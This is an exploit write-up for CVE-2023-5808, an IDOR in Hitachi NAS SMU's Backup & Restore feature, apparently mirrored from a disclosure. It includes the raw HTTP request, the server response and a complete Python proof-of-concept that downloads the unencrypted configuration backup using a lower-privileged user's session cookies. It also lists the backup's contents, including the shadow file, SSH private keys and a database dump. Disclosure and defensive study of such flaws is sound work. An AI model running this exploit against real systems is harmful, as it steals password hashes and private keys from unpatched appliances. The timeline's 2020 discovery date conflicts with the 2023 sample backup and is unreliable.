Share
## https://sploitus.com/exploit?id=BDF69D81-4397-5816-907B-3B35E6DFF167
## CVE-2023-5808
`CVE-2023-5808` is an *Insecure Direct Object Reference* (**IDOR**) in 
vulnerability found in Hitachi NAS' (`HNAS`') *System Management Unit* (`SMU`) 
`Backup & Restore` functionality. This vulnerability affects `SMU` versions 
prior to `14.8.7825.01`.

## Exploitation
This exploit requires the attacker to have control over the credentials of a 
user account that is not `Read-Only` or `Global Administrator`, i.e.:
- `Storage Administrator`
- `Server Administrator`
- `Server + Storage Administrator`

By design, users with the `Global Administrator` role should be able to access 
`SMU`'s `Backup & Restore` functionality, located at `https://<HOSTNAME/FQDN/IP>/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored` 
and send the following request, which would create and download an 
(unencrypted/password-less) backup:

```
GET /mgr/app/template/simple%2CBackupSmuScreen.vm/password/ HTTP/1.1
Host: REDACTED
Cookie: JSESSIONID=REDACTED; JSESSIONIDSSO=REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://REDACTED/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

```

If the request is successful, the `SMU` responds with the following response 
and starts the download of `smu_2023-04-12_1543+0200.zip`:

```
HTTP/1.1 200 
Cache-Control: PRIVATE
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
P3P: CP="NOI DSP CUR ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: cache
Content-Disposition: attachment;filename=smu_2023-04-12_1543+0200.zip
Content-Type: application/download
Content-Length: 1831412
Date: Wed, 12 Apr 2023 13:43:15 GMT
Connection: close
Server: SMU

[DATA]
```

However, due to an oversight in `SMU`'s business logic, an attacker with 
access to a `Storage Administrator`, `Server Administrator` or 
`Server + Storage Administrator` account can update the `JSESSIONID` and 
`JSESSIONIDSSO` cookies to match the cookies of the user that they are in 
possession of, allowing them to download the backup archive.

Thus, a script like `CVE-2023-5808.py` could be used to exploit this 
vulnerability:

```python
#!/usr/bin/python3
#
# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability 
# CVE:              CVE-2023-5808
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04        

import argparse
from datetime import datetime
from os import getcwd

import requests

parser = argparse.ArgumentParser(
    description="CVE-2023-5808 PoC",
    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )

args = parser.parse_args()

def download_file(hostname, jsessionid, jsessionidsso):
    # Set the filename:
    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"

    # GET request cookies
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers:
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the zip file to the CWD:
            backup_archive.write(file_download.content)

    print(f"{filename} has been downloaded to {getcwd()}")

if __name__ == "__main__":
    download_file(args.host, args.id, args.sso)
```

The justification of the CVSS v3.1 score of 7.6 could be further understood by 
examining the contents of `smu_2023-04-12_1543+0200.zip`:

```
$ tree -a
.
โ”œโ”€โ”€ adc_replic
โ”‚ย ย  โ”œโ”€โ”€ backup.properties
โ”‚ย ย  โ”œโ”€โ”€ mig_policies
โ”‚ย ย  โ”‚ย ย  โ”œโ”€โ”€ MIGR_TEST_POL
โ”‚ย ย  โ”‚ย ย  โ”‚ย ย  โ”œโ”€โ”€ 1
โ”‚ย ย  โ”‚ย ย  โ”‚ย ย  โ”‚ย ย  โ”œโ”€โ”€ config
โ”‚ย ย  โ”‚ย ย  โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ lockfile
โ”‚ย ย  โ”‚ย ย  โ”‚ย ย  โ”œโ”€โ”€ config
โ”‚ย ย  โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ lockfile
โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ next_schedule
โ”‚ย ย  โ”œโ”€โ”€ mig_rules
โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ MIGR_TEST
โ”‚ย ย  โ”œโ”€โ”€ pkgHandler.xml
โ”‚ย ย  โ”œโ”€โ”€ replic_policies
โ”‚ย ย  โ”œโ”€โ”€ replic_rules
โ”‚ย ย  โ”œโ”€โ”€ replic_schedules
โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ next_schedule
โ”‚ย ย  โ””โ”€โ”€ replic_scripts
โ”œโ”€โ”€ backup.properties
โ”œโ”€โ”€ mgr
โ”‚ย ย  โ”œโ”€โ”€ axalon.properties
โ”‚ย ย  โ”œโ”€โ”€ backup.properties
โ”‚ย ย  โ”œโ”€โ”€ banner.txt.disabled
โ”‚ย ย  โ”œโ”€โ”€ managedservers.json
โ”‚ย ย  โ”œโ”€โ”€ pkgHandler.xml
โ”‚ย ย  โ”œโ”€โ”€ systemmonitor_1.xml
โ”‚ย ย  โ”œโ”€โ”€ systemmonitor_2.xml
โ”‚ย ย  โ””โ”€โ”€ systemmonitor_3.xml
โ”œโ”€โ”€ network
โ”‚ย ย  โ””โ”€โ”€ yp.conf
โ”œโ”€โ”€ postgresql
โ”‚ย ย  โ”œโ”€โ”€ backup.properties
โ”‚ย ย  โ”œโ”€โ”€ config_pgdump.tar
โ”‚ย ย  โ”œโ”€โ”€ pkgHandler.xml
โ”‚ย ย  โ””โ”€โ”€ rolledupstats_pgdump.tar
โ”œโ”€โ”€ quorumdev2
โ”‚ย ย  โ”œโ”€โ”€ backup.properties
โ”‚ย ย  โ”œโ”€โ”€ CB-HNAS1-CLU
โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ cluster.conf
โ”‚ย ย  โ”œโ”€โ”€ HH-HNAS1-CLU
โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ cluster.conf
โ”‚ย ย  โ””โ”€โ”€ quorumdev2.conf
โ”œโ”€โ”€ quorumdevice
โ”‚ย ย  โ””โ”€โ”€ backup.properties
โ”œโ”€โ”€ readyToShip
โ”‚ย ย  โ”œโ”€โ”€ backup.properties
โ”‚ย ย  โ”œโ”€โ”€ pkgHandler.xml
โ”‚ย ย  โ”œโ”€โ”€ ssh_host_dsa_key
โ”‚ย ย  โ”œโ”€โ”€ ssh_host_dsa_key.pub
โ”‚ย ย  โ”œโ”€โ”€ ssh_host_key
โ”‚ย ย  โ”œโ”€โ”€ ssh_host_key.pub
โ”‚ย ย  โ”œโ”€โ”€ ssh_host_rsa_key
โ”‚ย ย  โ””โ”€โ”€ ssh_host_rsa_key.pub
โ”œโ”€โ”€ server-tools
โ”‚ย ย  โ”œโ”€โ”€ backup.properties
โ”‚ย ย  โ”œโ”€โ”€ ldap.conf.rb
โ”‚ย ย  โ”œโ”€โ”€ massage-commands-for-managed-servers
โ”‚ย ย  โ”œโ”€โ”€ ypcat-group
โ”‚ย ย  โ””โ”€โ”€ ypcat-passwd
โ”œโ”€โ”€ smu_users
โ”‚ย ย  โ”œโ”€โ”€ backup.properties
โ”‚ย ย  โ”œโ”€โ”€ manager
โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ ssh
โ”‚ย ย  โ”‚ย ย      โ””โ”€โ”€ known_hosts
โ”‚ย ย  โ”œโ”€โ”€ pkgHandler.xml
โ”‚ย ย  โ”œโ”€โ”€ root
โ”‚ย ย  โ”‚ย ย  โ””โ”€โ”€ ssh
โ”‚ย ย  โ”‚ย ย      โ””โ”€โ”€ known_hosts
โ”‚ย ย  โ””โ”€โ”€ shadow
โ””โ”€โ”€ tomcat
    โ”œโ”€โ”€ backup.properties
    โ”œโ”€โ”€ nas.keystore
    โ””โ”€โ”€ pkgHandler.xml

25 directories, 49 files
```

The `.zip` archive contains various files regarding the `SMU`'s configuration. 
The files included are (but not limited to):
- `SMU`'s `/etc/shadow` file, containing every user's `CLI` password hashes,
- `PEM DSA`, `PEM RSA`, and `OpenSSH RSA1` private keys,
- `PostgreSQL` database dump.

## Notes
This vulnerability is a "sister vulnerability" to 
[CVE-2023-6538][CVE-2023-6538].

## References
- [CVE-2023-5808][CVE-2023-5808]
- [CVE-2023-6538][CVE-2023-6538]
- [Hitachi Vantara Security Bulletin for CVE-2023-5808][Hitachi Vantara Security Bulletin]

## Timeline
- 2020-04-12 - Vulnerability discovered
- 2023-04-20 - Vulnerability reported to security.vulnerabilities@hitachivantara.com
- 2023-08-11 - Initial CVE number assignment
- 2023-12-06 - CVE numbers re-assigned
- 2023-12-11 - CVE numbers re-assigned
- 2023-12-11 - CVE published
- 2023-12-13 - Public disclosure

[CVE-2023-5808]:                        https://vulners.com/cve/CVE-2023-5808
[CVE-2023-6538]:                        https://vulners.com/cve/CVE-2023-6538
[Hitachi Vantara Security Bulletin]:    https://knowledge.hitachivantara.com/Security/System_Management_Unit_(SMU)_versions_prior_to_14.8.7825.01%2C_used_to_manage_Hitachi_Vantara_NAS_products_are_susceptible_to_unintended_information_disclosure_via_unprivileged_access_to_HNAS_configuration_backup_and_diagnostic_data.